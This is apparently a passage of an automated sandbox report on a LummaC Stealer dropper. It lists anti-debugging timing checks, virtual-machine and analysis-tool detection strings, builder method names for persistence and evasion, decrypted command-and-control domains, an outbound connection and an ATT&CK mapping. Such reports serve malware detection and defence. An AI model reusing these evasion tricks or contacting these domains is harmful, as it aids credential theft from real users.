Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18135BA second address: 18135C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18177B1 second address: 18177B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18177B7 second address: 18177C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18177C1 second address: 18177FE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F33985001DEh 0x00000008 pushad 0x00000009 popad 0x0000000a jo 00007F33985001D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F33985001E5h 0x00000017 jmp 00007F33985001E6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 181764E second address: 1817658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1817658 second address: 181765D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 181765D second address: 1817672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3398F1B58Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1828D77 second address: 1828D7D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1828D7D second address: 1828D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1828D87 second address: 1828D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1827848 second address: 1827852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1827852 second address: 182788D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F33985001E9h 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F33985001E8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18279F9 second address: 18279FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1827D07 second address: 1827D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 182B18B second address: 182B19F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3398F1B586h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F3398F1B586h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 182B19F second address: 182B1B9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F33985001D6h 0x00000008 jmp 00007F33985001E0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1838807 second address: 183880D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 183880D second address: 183882E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jng 00007F33985001F5h 0x0000000c jmp 00007F33985001E1h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 183882E second address: 1838832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1838660 second address: 1838681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F33985001E5h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1838681 second address: 18386A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3398F1B598h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18386A1 second address: 18386A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18386A7 second address: 18386AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18386AB second address: 18386C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F33985001E0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18489F2 second address: 1848A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3398F1B586h 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 184A6C0 second address: 184A6E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F33985001E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 184A6E0 second address: 184A6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 184A6E6 second address: 184A6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 184A89B second address: 184A89F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 184A89F second address: 184A8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 184EF12 second address: 184EF18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1853232 second address: 185323F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jc 00007F33985001D6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 185323F second address: 185325C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3398F1B597h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 185325C second address: 1853260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 185379A second address: 18537BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18537BA second address: 18537C0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 185394B second address: 1853971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3398F1B598h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F3398F1B588h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1853971 second address: 1853977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1853977 second address: 185397B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 185397B second address: 185397F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 185FD3A second address: 185FD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 185F7F6 second address: 185F7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 185F7FC second address: 185F83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3398F1B58Fh 0x0000000b jnc 00007F3398F1B593h 0x00000011 jmp 00007F3398F1B58Dh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3398F1B597h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 185F83E second address: 185F844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 185F844 second address: 185F84A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 185F84A second address: 185F858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F33985001D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18619AC second address: 18619BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3398F1B58Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18619BE second address: 18619C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18619C4 second address: 18619DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3398F1B596h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 18619DE second address: 18619F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Special instruction interceptor: First address: 15BD8DB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Special instruction interceptor: First address: 15BD9C7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Special instruction interceptor: First address: 175F66A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Special instruction interceptor: First address: 1802C79 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Memory allocated: 5AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Memory allocated: 5C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Memory allocated: 7C90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe TID: 5776

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: OAKPYEH4c6.exe, OAKPYEH4c6.exe, 00000000.00000002.1568255801.0000000001741000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Set-up.exe.0.dr	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: OAKPYEH4c6.exe, 00000000.00000002.1567434103.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp, OAKPYEH4c6.exe, 00000000.00000003.1526413340.00000000058E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: <Module>ladddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladddadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksiujwdkvbji0.resources
Source: OAKPYEH4c6.exe, 00000000.00000003.1526413340.00000000058E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: OAKPYEH4c6.exe, 00000000.00000002.1568800141.0000000001B2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8!
Source: OAKPYEH4c6.exe, OAKPYEH4c6.exe, 00000000.00000002.1567434103.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp, OAKPYEH4c6.exe, 00000000.00000003.1526413340.00000000058E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DetectVirtualMachine
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000003.00000003.1570099614.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: OAKPYEH4c6.exe, 00000000.00000002.1568255801.0000000001741000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Set-up.exe, 00000003.00000002.1768064156.0000000003AB8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1765988470.0000000003A41000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1569654726.00000000016F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

API call chain: ExitProcess graph end node

graph_2-12980

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	File opened: NTICE
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	File opened: SICE
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_00A9BAD0 LdrInitializeThunk,

2_2_00A9BAD0

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.0000000006C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bashfulacid.lat
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.0000000006C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tentabatte.lat
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.0000000006C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: curverpluch.lat
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.0000000006C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: talkynicer.lat
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.0000000006C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shapestickyr.lat
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.0000000006C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: manyrestro.lat
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.0000000006C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: slipperyloo.lat
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.0000000006C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wordyfindy.lat
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.0000000006C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: censeractersj.click

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"			Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"			Jump to behavior

Source: OAKPYEH4c6.exe, OAKPYEH4c6.exe, 00000000.00000002.1568255801.0000000001741000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: procmon.exe
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.8:49709 -> 185.121.15.192:80

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	1 Masquerading	OS Credential Dumping	841 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	12 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	261 Virtualization/Sandbox Evasion	Security Account Manager	261 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
